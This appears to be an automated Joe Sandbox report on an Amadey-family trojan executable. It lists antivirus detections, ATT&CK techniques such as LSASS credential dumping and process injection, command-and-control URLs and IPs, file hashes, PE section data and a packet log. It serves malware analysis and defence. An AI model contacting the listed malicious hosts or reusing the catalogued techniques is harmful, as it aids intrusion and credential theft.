Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
f9bcOz8SxR.exe50%VirustotalBrowse
f9bcOz8SxR.exe68%ReversingLabsWin32.Trojan.Amadey
f9bcOz8SxR.exe100%AviraTR/Crypt.TPM.Gen
f9bcOz8SxR.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20pn.top
147.45.113.159
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlf9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtdf9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#f9bcOz8SxR.exefalse
                		high
                http://home.twentytk20pn.top/WEf9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://httpbin.org/ipbeforef9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1f9bcOz8SxR.exe, 00000000.00000003.2620415267.00000000015F2000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2620438543.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633217403.00000000015F9000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://curl.se/docs/http-cookies.htmlf9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://curl.se/docs/hsts.html#f9bcOz8SxR.exefalse
                            		high
                            https://curl.se/docs/http-cookies.html#f9bcOz8SxR.exefalse
                              		high
                              https://curl.se/docs/alt-svc.htmlf9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://.cssf9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://.jpgf9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://home.twentytk20pn.top/WEelf.f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFf9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          34.226.108.155
                                          		httpbin.orgUnited States
                                          		14618AMAZON-AESUSfalse
                                          147.45.113.159
                                          		home.twentytk20pn.topRussian Federation
                                          		2895FREE-NET-ASFREEnetEUfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1578919
                                          Start date and time:2024-12-20 16:39:37 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 2s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:4
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:f9bcOz8SxR.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:1d057672840921889505863b33e87671.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 51%
                                          • Number of executed functions: 142
                                          • Number of non-executed functions: 51
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded IPs from analysis (whitelisted): 40.126.53.19, 13.107.246.63, 4.245.163.56
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          10:41:14API Interceptor66x Sleep call for process: f9bcOz8SxR.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          34.226.108.1551o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                            16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                              hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                  5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                          s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                                                            65AcuGF7W7.exeGet hashmaliciousCryptbotBrowse
                                                              147.45.113.159u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                              1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                              • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                              • twentytk20pn.top/v1/upload.php
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                              • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=2Rb3R6cTcShMDFLr1734664370
                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                              • twentytk20pn.top/v1/upload.php
                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                              • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=aMcIUlaEFPceCafP1734635514
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                              • twentytk20pn.top/v1/upload.php

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              httpbin.orgu16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 98.85.100.80
                                                              1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                              • 98.85.100.80
                                                              t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                              • 98.85.100.80
                                                              16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                              • 34.226.108.155
                                                              hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                              • 34.226.108.155
                                                              pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                              • 98.85.100.80
                                                              5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                              • 98.85.100.80
                                                              home.twentytk20pn.topu16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 147.45.113.159
                                                              1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                              • 147.45.113.159
                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                              • 147.45.113.159
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                              • 147.45.113.159
                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                              • 147.45.113.159
                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                              • 147.45.113.159
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                              • 147.45.113.159
                                                              SwJD3kiOwV.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 194.87.47.113
                                                              8dw8GAvqmM.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 194.87.47.113
                                                              UYJ0oreVew.exeGet hashmaliciousUnknownBrowse
                                                              • 194.87.47.113

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              FREE-NET-ASFREEnetEUu16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                              • 147.45.113.159
                                                              1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                              • 147.45.113.159
                                                              Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                              • 147.45.44.131
                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                              • 147.45.113.159
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                              • 147.45.113.159
                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                              • 147.45.113.159
                                                              https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                                              • 147.45.179.98
                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                              • 147.45.113.159
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                              • 147.45.113.159
                                                              iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                              • 147.45.47.15
                                                              AMAZON-AESUS1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 52.206.106.77
                                                              DzbIZ1HRMj.zipGet hashmaliciousUnknownBrowse
                                                              • 52.0.145.89
                                                              16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                              • 34.226.108.155
                                                              hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                              • 34.226.108.155
                                                              pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              securedoc_20241220T070409.htmlGet hashmaliciousUnknownBrowse
                                                              • 52.86.107.71
                                                              5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                              • 34.226.108.155
                                                              https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTAGet hashmaliciousUnknownBrowse
                                                              • 3.236.206.93
                                                              arm5.elfGet hashmaliciousMiraiBrowse
                                                              • 54.7.169.53

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              No created / dropped files found

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                              Entropy (8bit):7.987895209342701
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • VXD Driver (31/22) 0.00%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:f9bcOz8SxR.exe
                                                              File size:4'436'480 bytes
                                                              MD5:1d057672840921889505863b33e87671
                                                              SHA1:3bbc68098e4080f656c7f92147a54d05d18e1277
                                                              SHA256:e4420b07cff76b9f623b1e9ed3957d708769a744f245e27fb3b1e44cdc67eb35
                                                              SHA512:12f5d869fea831d66f0811bc00a2c25e4d156f24189a7eee3e4593d0062057638686f780132a188f52ac6de9fba78404517ca041205c6834dd135217d0ab4eed
                                                              SSDEEP:98304:B4PLy6XyZ1/zueq6LPtQ+IJU/Wxafa8Q8dTrVaLgZqyf+aCGxqGqE31y:2umi7ueq1HiqafFQmVBkG4O
                                                              TLSH:952633E5AA2FD26DC4FB1B74C2EBAA181D89107539C009B58E8B7059C82FE70D7B1974
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@..........................@......a^D...@... ............................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0xf51000
                                                              Entrypoint Section:.taggant
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                              DLL Characteristics:DYNAMIC_BASE
                                                              Time Stamp:0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp 00007F6184D74E5Ah
                                                              seto byte ptr [ebx+00h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              jmp 00007F6184D76E55h
                                                              add byte ptr [esi], al
                                                              add byte ptr [eax], 00000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              adc byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add eax, 0000000Ah
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], dh
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], bl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              push es
                                                              add byte ptr [eax], 00000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              adc byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              or ecx, dword ptr [edx]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              xor byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              mov al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              push es
                                                              add byte ptr [eax], 00000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              sub al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              or ecx, dword ptr [edx]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              xor byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              adc dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              mov dword ptr [eax+00000000h], eax
                                                              add byte ptr [eax], al
                                                              adc byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add dword ptr [edx], ecx
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x61905f0x73.idata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6180000x2b0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb4f5940x10dakbihel
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0xb4f5440x18dakbihel
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              0x10000x6170000x283e007f6ebc87a71fe2f26461378a0f492ccfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x6180000x2b00x20031ae601560fd8baf2b37778150275b3eFalse0.80078125data6.099968549772271IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .idata 0x6190000x10000x200e8fbf92e0939d0cd4935f0fe539e974dFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              0x61a0000x3820000x20060c0697eebab43dc681681e1d3a3ecd3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              dakbihel0x99c0000x1b40000x1b3800dd6e2db1bdac4259bfa83dd5f75f5808False0.9944495147459816data7.9549442757670565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              elpejykg0xb500000x10000x400ac8035ee0ba04c4232c0fe1763be2cbaFalse0.78125data6.120432676117238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .taggant0xb510000x30000x2200d714e71b200bc16a600640d05d11acd2False0.07065716911764706DOS executable (COM)0.7596637596523458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_MANIFEST0xb4f5a40x256ASCII text, with CRLF line terminators0.5100334448160535

                                                              Imports

                                                              DLLImport
                                                              kernel32.dlllstrcpy

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 20, 2024 16:40:45.832787991 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:45.832815886 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:45.832897902 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:45.861397982 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:45.861411095 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:47.601572990 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:47.603072882 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:47.603102922 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:47.604584932 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:47.604652882 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:47.606503963 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:47.606578112 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:47.613758087 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:47.613790035 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:47.673593044 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:47.935827971 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:47.936479092 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:47.937772989 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:47.945751905 CET49714443192.168.2.534.226.108.155
                                                              Dec 20, 2024 16:40:47.945774078 CET4434971434.226.108.155192.168.2.5
                                                              Dec 20, 2024 16:40:48.918992996 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.038821936 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.038984060 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.040304899 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.159940004 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160023928 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.160104036 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160155058 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.160197020 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160209894 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160228968 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160253048 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.160274982 CET4972080192.168.2.5147.45.113.159
